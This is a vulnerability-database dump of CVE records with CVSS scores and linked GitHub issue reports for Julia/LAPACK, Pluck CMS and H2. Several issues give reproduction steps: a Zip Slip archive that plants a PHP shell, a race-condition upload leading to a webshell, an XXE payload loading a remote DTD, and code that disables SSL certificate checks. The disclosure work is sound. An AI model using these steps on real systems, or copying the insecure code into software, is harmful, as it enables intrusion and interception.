[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:lapack_project:lapack:*:*:*:*:*:*:*:*", "matchCriteriaId": "860F1070-052A-491D-AF07-7179ABFF53DA", "versionEndExcluding": null, "versionEndIncluding": "3.10.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openblas_project:openblas:*:*:*:*:*:*:*:*", "matchCriteriaId": "8C8DAA17-150E-4182-ADD1-4317FD35ED9D", "versionEndExcluding": "0.3.18", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:julialang:julia:*:*:*:*:*:*:*:*", "matchCriteriaId": "50A99E6E-EE4D-443C-AEB3-C141F6CF2266", "versionEndExcluding": null, "versionEndIncluding": "1.6.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:julialang:julia:1.7.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "24F54DC9-8AC4-4578-B9B2-ECED81AA515B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:julialang:julia:1.7.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "FA4C5004-D212-444C-82B5-2A4B013E0442", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:julialang:julia:1.7.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "C3B59E6B-37B8-461B-9701-1FD3CCC15014", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:julialang:julia:1.7.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "DF1A3614-9C2C-4604-BC11-046866C656EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:julialang:julia:1.7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "2AD33935-9843-4F09-B5D9-A6C3D86E1022", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redhat:ceph_storage:2.0:*:*:*:*:*:*:*", "matchCriteriaId": "D07DF15E-FE6B-4DAF-99BB-2147CF7D7EEA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ceph_storage:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "516F4E8E-ED2F-4282-9DAB-D8B378F61258", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ceph_storage:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6E54096-5D45-4CB2-AC9A-DDB55BF2B94C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:ceph_storage:5.0:*:*:*:*:*:*:*", "matchCriteriaId": "4E37E1B3-6F68-4502-85D6-68333643BDFF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_container_storage:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "6FB187A4-F3A6-4993-AEF2-7808F1485EE2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:redhat:openshift_data_foundation:4.0:*:*:*:*:*:*:*", "matchCriteriaId": "0E2C021C-A9F0-4EB4-ADED-81D8B57B4563", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:redhat:enterprise_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "F4CFF558-3C47-480D-A2F0-BABF26042943", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:35:*:*:*:*:*:*:*", "matchCriteriaId": "80E516C0-98A4-4ADE-B69F-66A772E2BAAA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/JuliaLang/julia/issues/42415
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "JuliaLang", "julia" ]
@DilumAluthge alerted us to segfaults that were occurring on some machines during CI builds while running the LinearAlgebra/tridiag test. Using rr, we were able to trace these segfaults back to a call to `stegr!` in lapack.jl https://github.com/JuliaLang/julia/blob/44d484222005580432433b7889c4a56d25c0ea67/stdlib/LinearAlgebra/src/lapack.jl#L3827 While we ran out of time to fully debug and fix this, we have a MWE that replicates the problem on AMD machines. Here's the MWE: ``` using LinearAlgebra dv = Float32[-0.854084671, 1.2590245, -1.31365335, 0.7283687, -0.87726289, 2.06376457, 1.65424788, -0.640322149, -0.925165355, -0.857617259, -0.192993864, -0.79191643] ev = Float32[0.215433806, 0.260803878, -1.3471483, -0.799203992, 1.31649506, 0.0412902869, -0.639533341, 0.039149601, 0.485840291, 1.54775488, -0.503408968, 0] LAPACK.stegr!('V', 'V', copy(dv), copy(ev), 0.0f0, 1.0f0, 0, 0) ``` CC: @Keno
stegr! call segfault
https://api.github.com/repos/JuliaLang/LinearAlgebra.jl/issues/873/comments
11
2021-09-28T18:29:48Z
2024-11-26T11:40:36Z
https://github.com/JuliaLang/LinearAlgebra.jl/issues/873
2,694,366,540
873
2,845
CVE-2021-31745
2021-12-10T18:15:07.463
Session Fixation vulnerability in login.php in Pluck-CMS Pluck 4.7.15 allows an attacker to sustain unauthorized access to the platform. Because Pluck does not invalidate prior sessions after a password change, access can be sustained even after an administrator performs regular remediation attempts such as resetting their password.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/99" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/99" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.15:-:*:*:*:*:*:*", "matchCriteriaId": "5B0E653C-FAAD-43AE-A234-ED23E59BB31A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "384" ]
384
https://github.com/pluck-cms/pluck/issues/99
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
**Issue Summary** A session-fixation vulnerability exists within Pluck's administrative login system which can be abused to retain a valid login session even after an administrator has changed their password. **Detailed Description** It is possible to arbitrarily set the session ID of Pluck's "PHPSESSID" cookie. This cookie is used for maintaining administrative login sessions. This can be used in a session-fixation attack, for example, to sustain unauthorized access to the CMS after already gaining it through a primary vulnerability. Furthermore, Pluck does not expire sessions in a timely manner nor are sessions bound in any other way. This also allows an easier brute force attack, as it is possible to brute-force session IDs without rate-limits imposed by the normal login process. <img width="1633" alt="sessfix" src="https://user-images.githubusercontent.com/2632588/115493762-3579f800-a219-11eb-8f34-6dc7071fa85e.png"> **Reproduction Steps** 1. From Google Chrome, open the developer tools menu, navigate to: Application > Storage -> Cookies -> <PLUCK_DOMAIN> 2. Change the value of the "PHPSESSID" cookkie to an arbitrary value, such as "wolf". 3. Login to the pluck administrative panel, by visiting <PLUCK_DOMAIN>/login.php and login to the panel. 4. On a new browser, repeat steps 1 and 2. 5. On step 3, you will be given access without being prompted for administrative credentials. **Impact** After any primary exploit has occurred, the session fixation attack can be used in order to sustained unauthorized access. Because Pluck does not invalidate prior sessions after a password change, access can be sustained even after an administrator performs regular remediation attempts such as resetting their password.
Pluck 4.7.15 - Session Fixation Vulnerability
https://api.github.com/repos/pluck-cms/pluck/issues/99/comments
4
2021-04-21T03:45:08Z
2021-04-30T23:32:01Z
https://github.com/pluck-cms/pluck/issues/99
863,419,795
99
2,847
CVE-2021-31746
2021-12-10T18:15:07.653
Zip Slip vulnerability in Pluck-CMS Pluck 4.7.15 allows an attacker to upload specially crafted zip files, resulting in directory traversal and potentially arbitrary code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/100" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/100" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.15:-:*:*:*:*:*:*", "matchCriteriaId": "5B0E653C-FAAD-43AE-A234-ED23E59BB31A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "22" ]
22
https://github.com/pluck-cms/pluck/issues/100
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
**Issue Summary** Pluck's module and theme installers are vulnerable to directory traversal (via zip slip). **Detailed Description** It is possible to upload a malicious zip file in order to traverse directories outside of the intended environment, potentially allowing arbitrary code execution which will run with the permissions of the user assigned to the webserver. **Reproduction Steps** 1. Using the [evilarc tool](https://github.com/ptoomey3/evilarc), create a zip archive containing a PHP file with a depth of 2 `(python evilarch.py shell.php -d 2 -f wolf.zip)` 2. Visit `<pluck_domain>/admin.php?action=themeinstall `and upload the malicious `wolf.zip` you created. 3. Visit `<pluck_domain>/shell.php` and you now have a PHP shell. **Impact** This vulnerability makes remote code execution under the privileges of the user running the webserver application possible.
Pluck 4.7.15 - Zip Slip Vulnerability
https://api.github.com/repos/pluck-cms/pluck/issues/100/comments
2
2021-04-21T04:09:29Z
2021-04-26T18:17:23Z
https://github.com/pluck-cms/pluck/issues/100
863,429,744
100
2,848
CVE-2021-27984
2021-12-10T19:15:07.783
In Pluck-4.7.15 admin background a remote command execution vulnerability exists when uploading files.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/98" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/98" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.15:-:*:*:*:*:*:*", "matchCriteriaId": "5B0E653C-FAAD-43AE-A234-ED23E59BB31A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/pluck-cms/pluck/issues/98
[ "Exploit", "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
I uploaded any file in the "manage files" section, here I uploaded a "1.jpg". ![image](https://user-images.githubusercontent.com/68841518/109833422-36ac9100-7c7c-11eb-8280-2178bf4b8a86.png) Found two files at the upload folder. ![image](https://user-images.githubusercontent.com/68841518/109833499-462bda00-7c7c-11eb-8121-f279eb3da4ef.png) Looked at the source code for the delete file function. On lines 21 and 22 of "data/in/deletefile.php", the logic is that the file ".htaccess" is not allowed to be deleted. But it can be bypassed. ![image](https://user-images.githubusercontent.com/68841518/109833622-6196e500-7c7c-11eb-85c7-d64856642c96.png) I clicked on the delete button on the page for "1.jpg" and sniffered the packet. ![image](https://user-images.githubusercontent.com/68841518/109833654-68bdf300-7c7c-11eb-8608-21eb35dfb9b4.png) Change the value of the request parameter "var" to ".Htaccess" (the suffix name is not case sensitive in Windows) ![image](https://user-images.githubusercontent.com/68841518/109833697-707d9780-7c7c-11eb-9e61-4a646cf7dd15.png) ".Htaccess" is already in the trash. ![image](https://user-images.githubusercontent.com/68841518/109833726-77a4a580-7c7c-11eb-8e20-23284901eccd.png) The ".htaccess" in the upload folder has been copied to the trash folder. ![image](https://user-images.githubusercontent.com/68841518/109833760-7ecbb380-7c7c-11eb-8265-84a4bae877d5.png) Looked at the source code for the upload function, lines 34 to 52 of "data/in/file.php". ![image](https://user-images.githubusercontent.com/68841518/109833782-83906780-7c7c-11eb-9b4c-0c7f1c11d053.png) The code logic is as follows. 1. First check if the file suffix is ".htaccess". 2. then check if the file suffix is in the blacklist. 3. If the suffix is in the blacklist, add the suffix ".txt" for renaming and give permission. 4. If the suffix name is not in the blacklist, then give permission directly. Use race condition for attacks. First I create a "phpinfo.php" file. poc: <?php phpinfo();?> ![image](https://user-images.githubusercontent.com/68841518/109833807-88edb200-7c7c-11eb-8c4c-bf7fe17e81ee.png) Upload the file and sniffer a packet of the upload request and send it to intruder (add variable a=1 to keep sniffering the request packet). ![image](https://user-images.githubusercontent.com/68841518/109833824-8db26600-7c7c-11eb-937f-2f0e551062d0.png) Then sniffer a packet that accesses the file and send it to intruder. ![image](https://user-images.githubusercontent.com/68841518/109833857-94d97400-7c7c-11eb-9809-9f1e9b0165f9.png) Both intruder types are selected as "Numbers" and the number is 10000. ![image](https://user-images.githubusercontent.com/68841518/109833889-9b67eb80-7c7c-11eb-909c-769be85a982e.png) Threads are set to 20. ![image](https://user-images.githubusercontent.com/68841518/109833917-a28ef980-7c7c-11eb-8f73-7d63866ea63e.png) Start the attack, when the status of the request to access the file is 200, it means that the file was uploaded successfully and the code was executed. ![image](https://user-images.githubusercontent.com/68841518/109833949-a7ec4400-7c7c-11eb-965e-0ddb329d4313.png) ![image](https://user-images.githubusercontent.com/68841518/109833972-af135200-7c7c-11eb-9e4b-4d5a1c4f5fa4.png) Upload webshell with race condition and successfully gain access to the server. exploit: ![image](https://user-images.githubusercontent.com/68841518/109834007-b8042380-7c7c-11eb-9eb0-7902dcc4ac96.png) ![image](https://user-images.githubusercontent.com/68841518/109834045-be929b00-7c7c-11eb-9707-63eee39ab289.png) (Note: the ".php" file only exists when the race condition is in place, if the race condition is stopped the ".php" file will still be a ".php.txt" file, so the shell will disconnect. The shell will then disconnect. (So maintaining permissions requires that race condition be maintained at all times) From: huanyu@tsign.cn
Pluck-4.7.15 admin background exists a remote command execution vulnerability when uploading files
https://api.github.com/repos/pluck-cms/pluck/issues/98/comments
11
2021-03-03T16:03:21Z
2022-02-02T07:56:16Z
https://github.com/pluck-cms/pluck/issues/98
821,248,159
98
2,849
CVE-2021-31747
2021-12-10T19:15:07.827
Missing SSL Certificate Validation issue exists in Pluck 4.7.15 in update_applet.php, which could lead to man-in-the-middle attacks.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 5.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 2.5, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/101" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/pluck-cms/pluck/issues/101" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:pluck-cms:pluck:4.7.15:-:*:*:*:*:*:*", "matchCriteriaId": "5B0E653C-FAAD-43AE-A234-ED23E59BB31A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/pluck-cms/pluck/issues/101
[ "Third Party Advisory" ]
github.com
[ "pluck-cms", "pluck" ]
**Issue Summary** Pluck's update system deliberately skips SSL certificate validation. **Detailed Description** Within update_applet.php is the following code: ``` // Dont check ssl certifical curl_setopt($geturl, CURLOPT_SSL_VERIFYPEER, false); ``` This ensures peer SSL certificates are never valdiated. **Impact** In theory, this vulnerability can make the Pluck's update system susceptible to Man-in-the-middle attacks.
Pluck 4.7.15 - Missing SSL Certificate Validation in update_applet.php
https://api.github.com/repos/pluck-cms/pluck/issues/101/comments
3
2021-04-21T17:59:48Z
2021-12-26T04:06:21Z
https://github.com/pluck-cms/pluck/issues/101
864,135,418
101
2,850
CVE-2021-23463
2021-12-10T20:15:07.917
The package com.h2database:h2 from 1.4.198 and before 2.0.202 are vulnerable to XML External Entity (XXE) Injection via the org.h2.jdbc.JdbcSQLXML class object, when it receives parsed string data from org.h2.jdbc.JdbcResultSet.getSQLXML() method. If it executes the getSource() method when the parameter is DOMSource.class it will trigger the vulnerability.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.2, "source": "report@snyk.io", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Broken Link" ], "url": "https://github.com/h2database/h2database/commit/d83285fd2e48fb075780ee95badee6f5a15ea7f8%23diff-008c2e4462609982199cd83e7cf6f1d6b41296b516783f6752c44b9f15dc7bc3" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/h2database/h2database/issues/3195" }, { "source": "report@snyk.io", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/h2database/h2database/pull/3199" }, { "source": "report@snyk.io", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230818-0010/" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238" }, { "source": "report@snyk.io", "tags": [ "Not Applicable" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Broken Link" ], "url": "https://github.com/h2database/h2database/commit/d83285fd2e48fb075780ee95badee6f5a15ea7f8%23diff-008c2e4462609982199cd83e7cf6f1d6b41296b516783f6752c44b9f15dc7bc3" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/h2database/h2database/issues/3195" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/h2database/h2database/pull/3199" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20230818-0010/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JAVA-COMH2DATABASE-1769238" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Not Applicable" ], "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:h2database:h2:*:*:*:*:*:*:*:*", "matchCriteriaId": "BF697BB1-B848-4C0B-8DFF-EA0DB4F46D13", "versionEndExcluding": "2.0.202", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.4.198", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/h2database/h2database/issues/3195
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "h2database", "h2database" ]
**Hello, I am threedr3am of [SecCoder Security Lab](https://www.seccoder.club/) (contact@seccoder.club).** **We found a security vulnerability(SCSL-2021-1001) in the [H2-Database-Engine jar](https://mvnrepository.com/artifact/com.h2database/h2) when using this component to connect to the h2 database , The returned data content field is parsed through SQLXML, which will cause the client XXE (https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing).** - Oracle mysql jdbc also recently fixed a similar security vulnerability, please refer to: https://nvd.nist.gov/vuln/detail/CVE-2021-2471 - This is their fix commit: https://github.com/mysql/mysql-connector-j/commit/4993d5735fd84a46e7d949ad1bcaa0e9bb039824 ### vulnerability detail: When analyzing the data returned by the database, the org.h2.jdbc.JdbcResultSet class provides the getSQLXML(java.lang.String) method, which parses the string data into an object of the org.h2.jdbc.JdbcSQLXML class. ![image](https://user-images.githubusercontent.com/19884279/138405737-6d8bb123-9f8e-4e63-9b1f-c84c234f6bf2.png) When the object executes the getSource(Class<T> sourceClass) method, if the input parameter is DOMSource.class, it will result in unprotected parsing of XML, resulting in XXE. ![image](https://user-images.githubusercontent.com/19884279/138405645-66fbb3c7-6f4a-47f7-a3b4-eba7806d833c.png) ### vulnerability reproduction: 1. The table exists in the database ``` create table tb_test ( id bigint(20) unsigned NOT NULL AUTO_INCREMENT COMMENT '主键id', message text COMMENT 'SQLXML', PRIMARY KEY (`id`) ); ``` 2. There is data in the tb_test table ``` insert into tb_test(message) values('<?xml version="1.0" ?> <!DOCTYPE note [ <!ENTITY % remote SYSTEM "http://127.0.0.1:80/xxe.dtd"> %remote; ]>'); ``` 3. Query the database to return the message field and parse it through SQLXML ``` Statement statement = connection.createStatement(); statement.execute("select * from tb_test"); ResultSet resultSet = statement.getResultSet(); while (resultSet.next()) { SQLXML sqlxml = resultSet.getSQLXML("message"); sqlxml.getSource(DOMSource.class); } ``` 4. result ![image](https://user-images.githubusercontent.com/19884279/138405965-0771b509-b551-4708-b89a-e64a32d6374f.png)
Report a H2-Database-Engine SQLXML XXE vulnerability
https://api.github.com/repos/h2database/h2database/issues/3195/comments
18
2021-10-22T07:07:50Z
2021-12-21T08:07:04Z
https://github.com/h2database/h2database/issues/3195
1,033,251,738
3,195
2,851
CVE-2018-25021
2021-12-13T01:15:07.533
The TCP Server module in toxcore before 0.2.8 doesn't free the TCP priority queue under certain conditions, which allows a remote attacker to exhaust the system's memory, causing a denial of service (DoS).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
